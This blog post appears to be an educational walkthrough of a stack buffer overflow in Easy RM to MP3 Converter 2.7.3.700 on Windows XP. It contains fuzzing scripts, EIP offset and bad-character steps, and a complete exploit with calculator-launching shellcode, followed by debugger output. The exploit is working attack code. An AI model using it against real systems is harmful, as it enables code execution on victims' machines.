EasyRMtoMP3 Converter '.m3u' Conversion Buffer Overflow


0x00. PoC Environment and Tools

  1. VMware + WinXP_SP3_EN
  2. Immunity Debugger 1.85
  3. Vulnerable app download: https://www.exploit-db.com/exploits/10374/


0x02. Overflow Overview

  When Easy RM to MP3 Converter 2.7.3.700 converts an .m3u file, it loads the file contents without checking the size of the destination buffer, which allows a stack-based overflow.


0x03. Vulnerability Fuzzer

  Crash_Fuzzer.py

```python
# Crash file to crash EasyRMtoMP3Converter2.7.3.700.exe on WinXP SP3 EN, written in Python

f = open('crash_py.m3u', 'wb')   # binary mode, so every byte reaches the file unchanged
f.write(b"\x41" * 10000)
f.close()
print("Crash File m3u Create Successful.. \n")
```

   Run the script to produce crash_py.m3u and load it in Easy RM to MP3 Converter. Vary the number of "\x41" bytes through 10000, 20000 and 30000; somewhere between 25000 and 30000 bytes the program crashes outright.


0x04. Building the Exploit

  1. Locate the offset to EIP:

  Use pattern_create.rb, the helper that ships with metasploit-framework, to generate a test string

```shell
ruby pattern_create.rb -l 5000 > C:\pattern.txt
```

The generated string (middle omitted):

```text
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3A...omitted...b6Gb7Gb8Gb9Gc0Gc1Gc2Gc3Gc4Gc5Gc6Gc7Gc8Gc9Gd0Gd1Gd2Gd3Gd4Gd5Gd6Gd7Gd8Gd9Ge0Ge1Ge2Ge3Ge4Ge5Ge6Ge7Ge8Ge9Gf0Gf1Gf2Gf3Gf4Gf5Gf6Gf7Gf8Gf9Gg0Gg1Gg2Gg3Gg4Gg5Gg6Gg7Gg8Gg9Gh0Gh1Gh2Gh3Gh4Gh5Gh6Gh7Gh8Gh9Gi0Gi1Gi2Gi3Gi4Gi5Gi6Gi7Gi8Gi9Gj0Gj1Gj2Gj3Gj4Gj5Gj6Gj7Gj8Gj9Gk0Gk1Gk2Gk3Gk4Gk5Gk
```

  Replace the buffer in the fuzzer with it

  Crash_Find_EIP.py

```python
# Crash file to crash EasyRMtoMP3Converter2.7.3.700.exe on WinXP SP3 EN, written in Python

f = open('crash_py.m3u', 'wb')   # binary mode, so every byte reaches the file unchanged
# 25000 filler bytes followed by the 5000-byte pattern_create.rb output (middle omitted in this listing)
f.write(b"\x41" * 25000 +
        b"Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3A"   # ...omitted...
        b"b6Gb7Gb8Gb9Gc0Gc1Gc2Gc3Gc4Gc5Gc6Gc7Gc8Gc9Gd0Gd1Gd2Gd3Gd4Gd5Gd6Gd7Gd8Gd9Ge0Ge1Ge2Ge3Ge4Ge5Ge6Ge7Ge8Ge9Gf0Gf1Gf2Gf3Gf4Gf5Gf6Gf7Gf8Gf9Gg0Gg1Gg2Gg3Gg4Gg5Gg6Gg7Gg8Gg9Gh0Gh1Gh2Gh3Gh4Gh5Gh6Gh7Gh8Gh9Gi0Gi1Gi2Gi3Gi4Gi5Gi6Gi7Gi8Gi9Gj0Gj1Gj2Gj3Gj4Gj5Gj6Gj7Gj8Gj9Gk0Gk1Gk2Gk3Gk4Gk5Gk")
f.close()
print("Crash File m3u Create Successful.. \n")
```

   Run the script

  The crash reports EIP = 356a4234

  Next, use pattern_offset.rb to locate the offset of the faulting EIP value

```shell
ruby pattern_offset.rb -q 356a4234 -l 5000
```


  The computed offset is 1064 bytes

  So EIP sits at offset 25000 + 1064 = 26064 in the .m3u file
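How pattern_create.rb and pattern_offset.rb arrive at the 1064 above, as an added Python example that is not part of the original post: the pattern is built from Upper+lower+digit triplets, and the offset is simply the position of the EIP value's little-endian bytes inside it. The function names are my own.

```python
import string
import struct


def pattern_create(length):
    """Same cyclic pattern as Metasploit's pattern_create.rb: 3-byte groups of
    Upper+lower+digit, cycling the digit fastest, so that every 4-byte window
    is unique across the first 20280 bytes."""
    groups = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                groups.append(upper + lower + digit)
                if len(groups) * 3 >= length:
                    return "".join(groups)[:length]
    return "".join(groups)[:length]


def pattern_offset(eip_value, length=5000):
    """Same lookup as 'pattern_offset.rb -q <eip> -l <length>'.

    The debugger prints EIP as a 32-bit little-endian value, so 0x356a4234 is
    the byte sequence 34 42 6a 35 = "4Bj5" in memory; find where that window
    sits in the pattern. Returns -1 when the value did not come from the pattern."""
    needle = struct.pack("<I", eip_value).decode("latin-1")
    return pattern_create(length).find(needle)


if __name__ == "__main__":
    off = pattern_offset(0x356a4234)
    print("EIP overwritten at pattern offset %d, file offset %d" % (off, 25000 + off))
```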


  2. Find the address of a "JMP ESP"

  Pick the address of a "JMP ESP" instruction in C:\WINDOWS\system32\SHELL32.dll

  There are plenty of candidates; here we simply take the first one: 7c9d30d7.


  3. Eliminate bad characters:

  Build an .m3u file that places the byte sequence \x00~\xff (with \x00 removed up front) where the shellcode will later go

```python
# Crash file to crash EasyRMtoMP3Converter2.7.3.700.exe on WinXP SP3 EN, written in Python

junk = b"\x41" * 26064
eipaddr = b"\xd7\x30\x9d\x7c"    # jmp esp address from C:\WINDOWS\system32\SHELL32.dll 7c9d30d7

# bad characters found so far: \x00,
CharCheck = (b"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f"
             b"\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f"
             b"\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f"
             b"\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f"
             b"\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f"
             b"\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf"
             b"\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf"
             b"\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff")
# bad-character test sequence: whatever does not arrive on the stack intact is a bad character

data = junk + eipaddr + CharCheck

f = open('crash_py.m3u', 'wb')   # binary mode, so \x0a and friends are not translated by the text layer
f.write(data)
f.close()
print("Crash File m3u Create Successful.. \n")
```

  Generate the .m3u file with it, reload the program, set a breakpoint at 7c9d30d7 and run until it breaks there

  Inspect the memory at [ESP-8]

  The byte \x09 turns out to be bad; repeating the cycle, the bad characters removed in total are "\x00,\x01,\x09,\x0a"


  4. Build the shellcode:

  Here we simply take a calculator-popping shellcode from the internet that contains none of the bad characters above:

```python
shellcode = (b"\xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc\xd9\x74\x24\xf4\xb1"
             b"\x1e\x58\x31\x78\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85\x30"
             b"\x78\xbc\x65\xc9\x78\xb6\x23\xf5\xf3\xb4\xae\x7d\x02\xaa"
             b"\x3a\x32\x1c\xbf\x62\xed\x1d\x54\xd5\x66\x29\x21\xe7\x96"
             b"\x60\xf5\x71\xca\x06\x35\xf5\x14\xc7\x7c\xfb\x1b\x05\x6b"
             b"\xf0\x27\xdd\x48\xfd\x22\x38\x1b\xa2\xe8\xc3\xf7\x3b\x7a"
             b"\xcf\x4c\x4f\x23\xd3\x53\xa4\x57\xf7\xd8\x3b\x83\x8e\x83"
             b"\x1f\x57\x53\x64\x51\xa1\x33\xcd\xf5\xc6\xf5\xc1\x7e\x98"
             b"\xf5\xaa\xf1\x05\xa8\x26\x99\x3d\x3b\xc0\xd9\xfe\x51\x61"
             b"\xb6\x0e\x2f\x85\x19\x87\xb7\x78\x2f\x59\x90\x7b\xd7\x05"
             b"\x7f\xe8\x7b\xca")
```


0x04. Writing the Exploit:

```python
# Crash file to crash EasyRMtoMP3Converter2.7.3.700.exe on WinXP SP3 EN, written in Python

junk = b"\x41" * 26064
eipaddr = b"\xd7\x30\x9d\x7c"    # jmp esp address from C:\WINDOWS\system32\SHELL32.dll 7c9d30d7
shellcode = (b"\xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc\xd9\x74\x24\xf4\xb1"
             b"\x1e\x58\x31\x78\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85\x30"
             b"\x78\xbc\x65\xc9\x78\xb6\x23\xf5\xf3\xb4\xae\x7d\x02\xaa"
             b"\x3a\x32\x1c\xbf\x62\xed\x1d\x54\xd5\x66\x29\x21\xe7\x96"
             b"\x60\xf5\x71\xca\x06\x35\xf5\x14\xc7\x7c\xfb\x1b\x05\x6b"
             b"\xf0\x27\xdd\x48\xfd\x22\x38\x1b\xa2\xe8\xc3\xf7\x3b\x7a"
             b"\xcf\x4c\x4f\x23\xd3\x53\xa4\x57\xf7\xd8\x3b\x83\x8e\x83"
             b"\x1f\x57\x53\x64\x51\xa1\x33\xcd\xf5\xc6\xf5\xc1\x7e\x98"
             b"\xf5\xaa\xf1\x05\xa8\x26\x99\x3d\x3b\xc0\xd9\xfe\x51\x61"
             b"\xb6\x0e\x2f\x85\x19\x87\xb7\x78\x2f\x59\x90\x7b\xd7\x05"
             b"\x7f\xe8\x7b\xca")

data = junk + eipaddr + shellcode

f = open('crash_py.m3u', 'wb')   # binary mode, so every byte reaches the file unchanged
f.write(data)
f.close()
print("Crash File m3u Create Successful.. \n")
```


0x05. Attack Test

  Regenerate the .m3u file, reload Easy RM to MP3 Converter in WinDbg, set the breakpoint at 7c9d30d7 again and run until it breaks there

```text
0:000> dd /c 5 000ffd30
000ffd30  7c9d30d7 c931c0db 70167cbf 2474d9cc 581eb1f4
000ffd44  83187831 7803fce8 3085f468 c965bc78 f523b678
000ffd58  7daeb4f3 323aaa02 ed62bf1c 66d5541d 96e72129
000ffd6c  ca71f560 14f53506 1bfb7cc7 27f06b05 22fd48dd
000ffd80  e8a21b38 7a3bf7c3 234f4ccf 57a453d3 833bd8f7
000ffd94  571f838e a1516453 c6f5cd33 987ec1f5 05f1aaf5
000ffda8  3d9926a8 fed9c03b
```

  Single-step once with F10

```text
0:000> p
eax=00000001 ebx=00104a58 ecx=7c91003d edx=00ce0000 esi=77c5fce0 edi=00006664
eip=000ffd38 esp=000ffd38 ebp=00104678 iopl=0         nv up ei pl nz ac pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000216
000ffd38 bf7c1670cc      mov     edi,0CC70167Ch
```

  Look at the stack at ESP now

```text
0:000> dd /c 5 000ffd38
000ffd38  70167cbf 2474d9cc 581eb1f4 83187831 7803fce8
000ffd4c  3085f468 c965bc78 f523b678 7daeb4f3 323aaa02
000ffd60  ed62bf1c 66d5541d 96e72129 ca71f560 14f53506
000ffd74  1bfb7cc7 27f06b05 22fd48dd e8a21b38 7a3bf7c3
000ffd88  234f4ccf 57a453d3 833bd8f7 571f838e a1516453
000ffd9c  c6f5cd33 987ec1f5 05f1aaf5 3d9926a8 fed9c03b
000ffdb0  0eb66151 8719852f
```

  Execution of the shellcode skipped the "c931c0db" dword, so add 4 NOP instructions after the "JMP ESP"
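The two checks above (the bad-character comparison in step 3 and the stack dump just inspected) done in code, as an added example that is not part of the original post: parse WinDbg `dd` output back into bytes and compare it with what the exploit wrote, reporting the index of the first byte that differs. The sample input is the first three lines of the dump at 000ffd30 shown above; `parse_dd` and `first_mismatch` are my own names.

```python
import re
import struct

# First lines of the "dd /c 5 000ffd30" dump shown above (prompt line included on purpose).
DD_OUTPUT = """\
0:000> dd /c 5 000ffd30
000ffd30  7c9d30d7 c931c0db 70167cbf 2474d9cc 581eb1f4
000ffd44  83187831 7803fce8 3085f468 c965bc78 f523b678
000ffd58  7daeb4f3 323aaa02 ed62bf1c 66d5541d 96e72129
"""

# What the exploit wrote at that position: the jmp esp address followed by the
# start of the shellcode (first 56 of its 144 bytes).
EXPECTED = (b"\xd7\x30\x9d\x7c"
            b"\xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc\xd9\x74\x24\xf4\xb1"
            b"\x1e\x58\x31\x78\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85\x30"
            b"\x78\xbc\x65\xc9\x78\xb6\x23\xf5\xf3\xb4\xae\x7d\x02\xaa"
            b"\x3a\x32\x1c\xbf\x62\xed\x1d\x54\xd5\x66\x29\x21\xe7\x96")

DD_LINE = re.compile(r"^\s*([0-9a-f]{8})\s+((?:[0-9a-f]{8}\s*)+)$", re.I)


def parse_dd(text):
    """Turn WinDbg 'dd' output into the raw bytes it displays.

    Each dword is printed as a little-endian 32-bit value, so it is re-packed
    with '<I' to recover the byte order that actually sits in memory."""
    raw = b""
    for line in text.splitlines():
        m = DD_LINE.match(line)
        if not m:            # prompt or unrelated line
            continue
        for word in m.group(2).split():
            raw += struct.pack("<I", int(word, 16))
    return raw


def first_mismatch(expected, actual):
    """Index of the first byte of `expected` that does not survive in `actual`,
    or -1 if it arrived intact. In a bad-character round this index points at
    the byte that was dropped or altered (the \\x09 found above)."""
    n = min(len(expected), len(actual))
    for i in range(n):
        if expected[i:i + 1] != actual[i:i + 1]:
            return i
    return -1 if len(actual) >= len(expected) else n


if __name__ == "__main__":
    stack = parse_dd(DD_OUTPUT)
    print("%d bytes on the stack, first mismatch at %d" % (len(stack), first_mismatch(EXPECTED, stack)))
```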

  Modify the exploit:

```python
# Crash file to crash EasyRMtoMP3Converter2.7.3.700.exe on WinXP SP3, written in Python

junk = b"\x41" * 26064
eipaddr = b"\xd7\x30\x9d\x7c"    # jmp esp address from C:\WINDOWS\system32\SHELL32.dll 7c9d30d7
nops = b"\x90" * 8
shellcode = (b"\xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc\xd9\x74\x24\xf4\xb1"
             b"\x1e\x58\x31\x78\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85\x30"
             b"\x78\xbc\x65\xc9\x78\xb6\x23\xf5\xf3\xb4\xae\x7d\x02\xaa"
             b"\x3a\x32\x1c\xbf\x62\xed\x1d\x54\xd5\x66\x29\x21\xe7\x96"
             b"\x60\xf5\x71\xca\x06\x35\xf5\x14\xc7\x7c\xfb\x1b\x05\x6b"
             b"\xf0\x27\xdd\x48\xfd\x22\x38\x1b\xa2\xe8\xc3\xf7\x3b\x7a"
             b"\xcf\x4c\x4f\x23\xd3\x53\xa4\x57\xf7\xd8\x3b\x83\x8e\x83"
             b"\x1f\x57\x53\x64\x51\xa1\x33\xcd\xf5\xc6\xf5\xc1\x7e\x98"
             b"\xf5\xaa\xf1\x05\xa8\x26\x99\x3d\x3b\xc0\xd9\xfe\x51\x61"
             b"\xb6\x0e\x2f\x85\x19\x87\xb7\x78\x2f\x59\x90\x7b\xd7\x05"
             b"\x7f\xe8\x7b\xca")

data = junk + eipaddr + nops + shellcode

f = open('crash_py.m3u', 'wb')   # binary mode, so every byte reaches the file unchanged
f.write(data)
f.close()
print("Crash File m3u Create Successful.. \n")
```

  Regenerate the .m3u file and reload EasyRMtoMP3Converter

  The NOP count is still not enough, so add another 4 \x90

  The shellcode runs successfully


0x06. References

  Corelan Team: https://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/

  Packet Storm: https://packetstormsecurity.com/files/101960/Easy-RM-to-MP3-Converter-2.7.3.700-Stack-Buffer-Overflow.html

  Exploit-DB: https://www.exploit-db.com/exploits/10374/

  Marcelo Carvalho: https://www.youtube.com/watch?v=aEZKGW_VTd4&t=181s


posted @ 2017-02-28 22:35  Ring0_Mobov  views (874)  comments (0)